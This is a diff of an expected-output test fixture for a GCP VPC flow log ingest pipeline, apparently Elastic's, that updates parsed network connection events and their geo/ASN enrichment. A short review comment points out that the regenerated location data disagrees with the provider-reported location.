@@ -2557,6 +2675,18 @@ "id": "1ulp77rfdvho4g", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:FsRs9Upw/72M8FLScc+hnC6ByYQ=", + "bytes": 1239, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 18, + "direction": "inbound" } }, { @@ -2565,11 +2695,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -2647,7 +2782,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391301900Z", + "ingested": "2021-12-14T14:43:27.415186201Z", "original": "{\"insertId\":\"1ulp77rfdvho5r\",\"jsonPayload\":{\"bytes_sent\":\"63853\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33552},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213244028Z\",\"packets_sent\":\"363\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075811571Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075811571Z", 
@@ -2658,41 +2793,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.14", - "port": 33924, - "bytes": 1458, - "ip": "67.43.156.14", - "packets": 7 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:zZLAweyUiKKYNJrw7Pxer9kCofQ=", - "bytes": 1458, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:11.981Z", "ecs": { "version": "1.12.0" @@ -2703,6 +2803,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -2723,8 +2826,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 33924, + "bytes": 1458, + "ip": "67.43.156.14", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.391306600Z", + "ingested": "2021-12-14T14:43:27.415186724Z", "original": "{\"insertId\":\"1ulp77rfdvho5k\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":33924},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:20.745658276Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:20.634435179Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:46:20.634435179Z", 
@@ -2732,6 +2860,18 @@ "id": "1ulp77rfdvho5k", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:zZLAweyUiKKYNJrw7Pxer9kCofQ=", + "bytes": 1458, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -2740,11 +2880,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33534, 
@@ -2822,7 +2967,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391310300Z", + "ingested": "2021-12-14T14:43:27.415187219Z", "original": "{\"insertId\":\"1ulp77rfdvho55\",\"jsonPayload\":{\"bytes_sent\":\"252397\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33534,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597088427Z\",\"packets_sent\":\"260\",\"reporter\":\"SRC\",\"rtt_msec\":\"311\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075942176Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075942176Z", @@ -2838,11 +2983,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33694, 
@@ -2920,7 +3070,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391314900Z", + "ingested": "2021-12-14T14:43:27.415187620Z", "original": "{\"insertId\":\"1ulp77rfdvho60\",\"jsonPayload\":{\"bytes_sent\":\"205787\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33694,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565117754Z\",\"packets_sent\":\"265\",\"reporter\":\"SRC\",\"rtt_msec\":\"216\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566551903Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.566551903Z", 
@@ -2931,43 +3081,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" - }, - "as": { - "number": 33652 - }, - "address": "67.43.156.13", - "port": 65263, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.139.99.242", - "port": 9200, - "bytes": 106409, - "packets": 607, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:NVPn1fsNGKIWh4nC6Og4qM8A3kY=", - "bytes": 106409, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 607, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:11.981Z", "ecs": { "version": "1.12.0" @@ -2978,6 +3091,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -2998,15 +3114,52 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391318800Z", - "original": "{\"insertId\":\"1ulp77rfdvho49\",\"jsonPayload\":{\"bytes_sent\":\"106409\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65263,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220748025Z\",\"packets_sent\":\"607\",\"reporter\":\"SRC\",\"rtt_msec\":\"87\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.270990648Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 65263, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.139.99.242", + "port": 9200, + "bytes": 106409, + "packets": 607, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, + "event": { + "ingested": "2021-12-14T14:43:27.415188069Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho49\",\"jsonPayload\":{\"bytes_sent\":\"106409\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65263,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220748025Z\",\"packets_sent\":\"607\",\"reporter\":\"SRC\",\"rtt_msec\":\"87\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.270990648Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", "start": "2019-06-14T03:40:01.270990648Z", "end": "2019-06-14T03:49:56.220748025Z", "id": "1ulp77rfdvho49", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:NVPn1fsNGKIWh4nC6Og4qM8A3kY=", + "bytes": 106409, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 607, + "direction": "outbound" } }, { @@ -3021,11 +3174,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33534, 
@@ -3097,7 +3255,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391322600Z", + "ingested": "2021-12-14T14:43:27.415188691Z", "original": "{\"insertId\":\"1ulp77rfdvho4t\",\"jsonPayload\":{\"bytes_sent\":\"61242\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33534},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597088427Z\",\"packets_sent\":\"356\",\"reporter\":\"DEST\",\"rtt_msec\":\"311\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075942176Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075942176Z", @@ -3113,11 +3271,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 49680, 
@@ -3195,7 +3358,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391326400Z", + "ingested": "2021-12-14T14:43:27.415189064Z", "original": "{\"insertId\":\"1ulp77rfdvho68\",\"jsonPayload\":{\"bytes_sent\":\"248826\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":49680,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"siem-windows\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"},\"end_time\":\"2019-06-14T03:49:55.705469925Z\",\"packets_sent\":\"735\",\"reporter\":\"SRC\",\"rtt_msec\":\"113\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.711043814Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.711043814Z", 
@@ -3206,9 +3369,39 @@ } }, { + "@timestamp": "2019-06-14T03:50:11.981Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.87.40.76", + "192.168.2.117" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } + }, "destination": { "geo": { "continent_name": "America", 
@@ -3229,6 +3422,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415189468Z", + "original": "{\"insertId\":\"1ulp77rfdvho5n\",\"jsonPayload\":{\"bytes_sent\":\"1777\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":33862,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:11.779780615Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:11.655143526Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", + "start": "2019-06-14T03:46:11.655143526Z", + "end": "2019-06-14T03:46:11.779780615Z", + "id": "1ulp77rfdvho5n", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -3240,22 +3443,27 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:11.981Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "192.168.2.117" + "10.139.99.242", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", "rtt": { - "ms": 36 + "ms": 219 } }, "source": { 
@@ -3271,30 +3479,18 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391329800Z", - "original": "{\"insertId\":\"1ulp77rfdvho5n\",\"jsonPayload\":{\"bytes_sent\":\"1777\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":33862,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:11.779780615Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:11.655143526Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", - "start": "2019-06-14T03:46:11.655143526Z", - "end": "2019-06-14T03:46:11.779780615Z", - "id": "1ulp77rfdvho5n", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65321, 
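Review bot: The regenerated `destination.geo` / `destination.as` block for 67.43.156.13 (the `"continent_name": "Asia"`, `"country_name": "Bhutan"` and `"number": 35908` lines) no longer agrees with the GCP-reported `dest_location` carried in `event.original` (`asn: 33652`, city Broomfield, region Colorado), and the city/region detail is dropped entirely rather than kept alongside the lookup result. Presumably the pipeline's geoip/asn enrichment now overwrites the whole `geo` and `as` objects instead of only filling them when the provider supplied nothing, and this expectation as regenerated bakes that override in. If the intent is to preserve provider-reported location when present, the enrichment should be conditioned on the field being absent (or written to a separate target) and this fixture regenerated afterwards; if the override is intentional, a short comment next to the geoip processor stating that `dest_location` is superseded by the local database would stop the next reader from treating this mismatch as a bug. The document this hunk edits begins in an earlier hunk, so its `source` side is not visible here.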
@@ -3308,6 +3504,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415189932Z", + "original": "{\"insertId\":\"1ulp77rfdvho5l\",\"jsonPayload\":{\"bytes_sent\":\"116845\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65321,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"594\",\"reporter\":\"SRC\",\"rtt_msec\":\"219\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.843986502Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.843986502Z", + "end": "2019-06-14T03:49:56.312105537Z", + "id": "1ulp77rfdvho5l", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -3319,46 +3525,6 @@ "iana_number": "6", "packets": 594, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:11.981Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.139.99.242", - "67.43.156.13" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 219 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391334100Z", - "original": "{\"insertId\":\"1ulp77rfdvho5l\",\"jsonPayload\":{\"bytes_sent\":\"116845\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65321,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"594\",\"reporter\":\"SRC\",\"rtt_msec\":\"219\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.843986502Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.843986502Z", - "end": "2019-06-14T03:49:56.312105537Z", - "id": "1ulp77rfdvho5l", - "category": "network", - "type": "connection" } }, { 
@@ -3373,11 +3539,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33524, @@ -3449,7 +3620,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391338900Z", + "ingested": "2021-12-14T14:43:27.415190464Z", "original": "{\"insertId\":\"1ulp77rfdvho65\",\"jsonPayload\":{\"bytes_sent\":\"4614\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33524},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461087350Z\",\"packets_sent\":\"58\",\"reporter\":\"DEST\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.790136141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:24.790136141Z", 
